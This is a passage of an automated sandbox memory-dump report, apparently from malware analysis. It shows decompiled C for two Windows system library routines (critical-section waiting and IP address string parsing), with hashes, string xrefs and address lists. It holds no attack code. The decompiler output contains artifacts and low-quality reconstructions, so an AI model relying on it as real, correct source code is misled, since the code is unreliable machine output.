                                                                                                                                                      • Instruction ID: 2c4241de30dbebbddd55ece1904ee2d3fd49680e524526eb2bec6d766e840e29
                                                                                                                                                      • Opcode Fuzzy Hash: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                      • Instruction Fuzzy Hash: D051F971600707ABEF16EF29DC80FA673AAAF54720F10461AFD45DB255EA63E84187D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E01F9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				short _v66;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      				intOrPtr _t39;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				intOrPtr _t42;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				signed int _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				signed char _t67;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr* _t80;
                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                      				intOrPtr* _t85;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      
                                                                                                                                                      				_t80 = __edi;
                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                      				_t70 = __ecx;
                                                                                                                                                      				_t84 = _a4;
                                                                                                                                                      				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                      					E01F8DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                      					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                      				}
                                                                                                                                                      				_push(0);
                                                                                                                                                      				__eflags = _t38 - 0xffffffff;
                                                                                                                                                      				if(_t38 == 0xffffffff) {
                                                                                                                                                      					_t39 =  *0x205793c; // 0x0
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(_t84);
                                                                                                                                                      					_t40 = E01F716C0(_t39);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t40 = E01F6F9D4(_t38);
                                                                                                                                                      				}
                                                                                                                                                      				_pop(_t85);
                                                                                                                                                      				__eflags = _t40;
                                                                                                                                                      				if(__eflags < 0) {
                                                                                                                                                      					_push(_t40);
                                                                                                                                                      					E01FB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                      					asm("int3");
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L21:
                                                                                                                                                      						_t76 =  *[fs:0x18];
                                                                                                                                                      						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                      						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                      						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                      							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                      							_v66 = 0x1722;
                                                                                                                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_t76 =  &_v72;
                                                                                                                                                      							_push( &_v72);
                                                                                                                                                      							_v28 = _t85;
                                                                                                                                                      							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                      							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_push(0x10);
                                                                                                                                                      							_push(0x20402);
                                                                                                                                                      							E01F701A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t43 = _v8;
                                                                                                                                                      							_push(_t80);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							__eflags = _t43 - 0xffffffff;
                                                                                                                                                      							if(_t43 == 0xffffffff) {
                                                                                                                                                      								_t71 =  *0x205793c; // 0x0
                                                                                                                                                      								_push(_t85);
                                                                                                                                                      								_t44 = E01F71F28(_t71);
                                                                                                                                                      							} else {
                                                                                                                                                      								_t44 = E01F6F8CC(_t43);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t44 - 0x102;
                                                                                                                                                      							if(_t44 != 0x102) {
                                                                                                                                                      								__eflags = _t44;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									_push(_t44);
                                                                                                                                                      									E01FB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                      									asm("int3");
                                                                                                                                                      									E01FF2306(_t85);
                                                                                                                                                      									__eflags = _t67 & 0x00000002;
                                                                                                                                                      									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                      										_t7 = _t67 + 2; // 0x4
                                                                                                                                                      										_t72 = _t7;
                                                                                                                                                      										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                      										__eflags = _t67 - _t67;
                                                                                                                                                      										if(_t67 == _t67) {
                                                                                                                                                      											E01F9EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									return 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = _v24;
                                                                                                                                                      									if(_v24 != 0) {
                                                                                                                                                      										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                      									}
                                                                                                                                                      									return 2;
                                                                                                                                                      								}
                                                                                                                                                      								goto L36;
                                                                                                                                                      							}
                                                                                                                                                      							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                      							_push(_t67);
                                                                                                                                                      							_t46 = E01FB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                      							_push(_t77);
                                                                                                                                                      							E01FC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                      							_t48 =  *_t85;
                                                                                                                                                      							_t92 = _t91 + 0x18;
                                                                                                                                                      							__eflags = _t48 - 0xffffffff;
                                                                                                                                                      							if(_t48 == 0xffffffff) {
                                                                                                                                                      								_t49 = 0;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                      							}
                                                                                                                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_push(_t49);
                                                                                                                                                      							_t50 = _v12;
                                                                                                                                                      							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                      							_push(_t85);
                                                                                                                                                      							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                      							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                      							E01FC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                      							_t53 =  *_t85;
                                                                                                                                                      							_t93 = _t92 + 0x20;
                                                                                                                                                      							_t67 = _t67 + 1;
                                                                                                                                                      							__eflags = _t53 - 0xffffffff;
                                                                                                                                                      							if(_t53 != 0xffffffff) {
                                                                                                                                                      								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                      								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t67 - 2;
                                                                                                                                                      							if(_t67 > 2) {
                                                                                                                                                      								__eflags = _t85 - 0x20520c0;
                                                                                                                                                      								if(_t85 != 0x20520c0) {
                                                                                                                                                      									_t76 = _a4;
                                                                                                                                                      									__eflags = _a4 - _a8;
                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                      										E01FF217A(_t71, __eflags, _t85);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_push("RTL: Re-Waiting\n");
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0x65);
                                                                                                                                                      							_a8 = _a4;
                                                                                                                                                      							E01FC3F92();
                                                                                                                                                      							_t91 = _t93 + 0xc;
                                                                                                                                                      							__eflags =  *0x7ffe0382;
                                                                                                                                                      							if( *0x7ffe0382 != 0) {
                                                                                                                                                      								goto L21;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L36;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t40;
                                                                                                                                                      				}
                                                                                                                                                      				L36:
                                                                                                                                                      			}

                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 01FD24FA
                                                                                                                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FD248D
                                                                                                                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FD24BD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                      • API String ID: 0-3177188983
                                                                                                                                                      • Opcode ID: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                      • Instruction ID: 603ae29aa05632830ad76e2e9360052b06ac5c0c235692252f73631b10647e54
                                                                                                                                                      • Opcode Fuzzy Hash: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                      • Instruction Fuzzy Hash: BA410A71A00705EBDB20EF68CD84F7A77B9EF45720F148605FA559B2C2D632E941C7A0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E01FAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _t105;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t114;
                                                                                                                                                      				short _t115;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				signed short* _t119;
                                                                                                                                                      				short _t120;
                                                                                                                                                      				char _t122;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      				signed int _t136;
                                                                                                                                                      				intOrPtr _t143;
                                                                                                                                                      				signed int _t158;
                                                                                                                                                      				signed short* _t164;
                                                                                                                                                      				signed int _t167;
                                                                                                                                                      				void* _t170;
                                                                                                                                                      
                                                                                                                                                      				_t158 = 0;
                                                                                                                                                      				_t164 = _a4;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_t136 = 0;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                      					if(_t167 == _t158) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t118 = _v20 - _t158;
                                                                                                                                                      					if(_t118 == 0) {
                                                                                                                                                      						if(_t167 == 0x3a) {
                                                                                                                                                      							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                      								break;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t119 =  &(_t164[1]);
                                                                                                                                                      								if( *_t119 != _t167) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_t143 = 2;
                                                                                                                                                      								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                      								_v28 = 1;
                                                                                                                                                      								_v8 = _t143;
                                                                                                                                                      								_t136 = _t136 + 1;
                                                                                                                                                      								L47:
                                                                                                                                                      								_t164 = _t119;
                                                                                                                                                      								_v20 = _t143;
                                                                                                                                                      								L14:
                                                                                                                                                      								if(_v24 == _t158) {
                                                                                                                                                      									L19:
                                                                                                                                                      									_t164 =  &(_t164[1]);
                                                                                                                                                      									_t158 = 0;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v12 == _t158) {
                                                                                                                                                      									if(_v16 > 4) {
                                                                                                                                                      										L29:
                                                                                                                                                      										return 0xc000000d;
                                                                                                                                                      									}
                                                                                                                                                      									_t120 = E01FAEE02(_v24, _t158, 0x10);
                                                                                                                                                      									_t170 = _t170 + 0xc;
                                                                                                                                                      									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                      									_t136 = _t136 + 1;
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v16 > 3) {
                                                                                                                                                      									goto L29;
                                                                                                                                                      								}
                                                                                                                                                      								_t122 = E01FAEE02(_v24, _t158, 0xa);
                                                                                                                                                      								_t170 = _t170 + 0xc;
                                                                                                                                                      								if(_t122 > 0xff) {
                                                                                                                                                      									goto L29;
                                                                                                                                                      								}
                                                                                                                                                      								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L21:
                                                                                                                                                      						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(E01FA685D(_t167, 4) == 0) {
                                                                                                                                                      								if(E01FA685D(_t167, 0x80) != 0) {
                                                                                                                                                      									if(_v12 > 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t127 = 1;
                                                                                                                                                      									_a7 = 1;
                                                                                                                                                      									_v24 = _t164;
                                                                                                                                                      									_v20 = 1;
                                                                                                                                                      									_v16 = 1;
                                                                                                                                                      									L36:
                                                                                                                                                      									if(_v20 == _t127) {
                                                                                                                                                      										goto L19;
                                                                                                                                                      									}
                                                                                                                                                      									_t158 = 0;
                                                                                                                                                      									goto L14;
                                                                                                                                                      								}
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_a7 = 0;
                                                                                                                                                      							_v24 = _t164;
                                                                                                                                                      							_v20 = 1;
                                                                                                                                                      							_v16 = 1;
                                                                                                                                                      							goto L19;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t130 = _t118 - 1;
                                                                                                                                                      					if(_t130 != 0) {
                                                                                                                                                      						if(_t130 == 1) {
                                                                                                                                                      							goto L21;
                                                                                                                                                      						}
                                                                                                                                                      						_t127 = 1;
                                                                                                                                                      						goto L36;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t167 >= 0x80) {
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t167 == 0x3a) {
                                                                                                                                                      							_t158 = 0;
                                                                                                                                                      							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                      								break;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t119 =  &(_t164[1]);
                                                                                                                                                      								if( *_t119 != _t167) {
                                                                                                                                                      									_v8 = _v8 + 1;
                                                                                                                                                      									L13:
                                                                                                                                                      									_v20 = _t158;
                                                                                                                                                      									goto L14;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v28 != 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_v28 = _v8 + 1;
                                                                                                                                                      								_t143 = 2;
                                                                                                                                                      								_v8 = _v8 + _t143;
                                                                                                                                                      								goto L47;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							_t158 = 0;
                                                                                                                                                      							goto L13;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if(E01FA685D(_t167, 4) != 0) {
                                                                                                                                                      						_v16 = _v16 + 1;
                                                                                                                                                      						goto L19;
                                                                                                                                                      					}
                                                                                                                                                      					if(E01FA685D(_t167, 0x80) != 0) {
                                                                                                                                                      						_v16 = _v16 + 1;
                                                                                                                                                      						if(_v12 > 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_a7 = 1;
                                                                                                                                                      						goto L19;
                                                                                                                                                      					}
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				 *_a8 = _t164;
                                                                                                                                                      				if(_v12 != 0) {
                                                                                                                                                      					if(_v12 != 3) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _v8 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                      					if(_v20 != 1) {
                                                                                                                                                      						if(_v20 != 2) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                      						L65:
                                                                                                                                                      						_t105 = _v28;
                                                                                                                                                      						if(_t105 != 0) {
                                                                                                                                                      							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                      							E01F88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                      							_t110 = 8;
                                                                                                                                                      							E01F7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v12 != 0) {
                                                                                                                                                      						if(_v16 > 3) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						_t114 = E01FAEE02(_v24, 0, 0xa);
                                                                                                                                                      						_t170 = _t170 + 0xc;
                                                                                                                                                      						if(_t114 > 0xff) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                      						goto L65;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v16 > 4) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      					_t115 = E01FAEE02(_v24, 0, 0x10);
                                                                                                                                                      					_t170 = _t170 + 0xc;
                                                                                                                                                      					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                      					goto L65;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L29;
                                                                                                                                                      				}
                                                                                                                                                      			}

























                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc2018
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd36
                                                                                                                                                      0x01fafe0f
                                                                                                                                                      0x01fafe16
                                                                                                                                                      0x01fba3ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fba3b3
                                                                                                                                                      0x01fba3b3
                                                                                                                                                      0x01fafe1f
                                                                                                                                                      0x01fded25
                                                                                                                                                      0x01fded86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded91
                                                                                                                                                      0x01fded95
                                                                                                                                                      0x01fded95
                                                                                                                                                      0x01fded9a
                                                                                                                                                      0x01fdedad
                                                                                                                                                      0x01fdedb3
                                                                                                                                                      0x01fdedba
                                                                                                                                                      0x01fdedc4
                                                                                                                                                      0x01fdedc9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdedcc
                                                                                                                                                      0x01fded2a
                                                                                                                                                      0x01fded55
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded61
                                                                                                                                                      0x01fded66
                                                                                                                                                      0x01fded6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded7d
                                                                                                                                                      0x01fded30
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded3c
                                                                                                                                                      0x01fded43
                                                                                                                                                      0x01fded4b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3965848254-0
                                                                                                                                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction ID: d2f2cb8100af77b868a69a99b2a040054c5078c8bd814cde7ba8e4eb19fe2db0
                                                                                                                                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction Fuzzy Hash: 7091D1B1D0020AEEDF25CF58C8856FEBBB4FF40704FA4806AD651AB252E7364A41CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%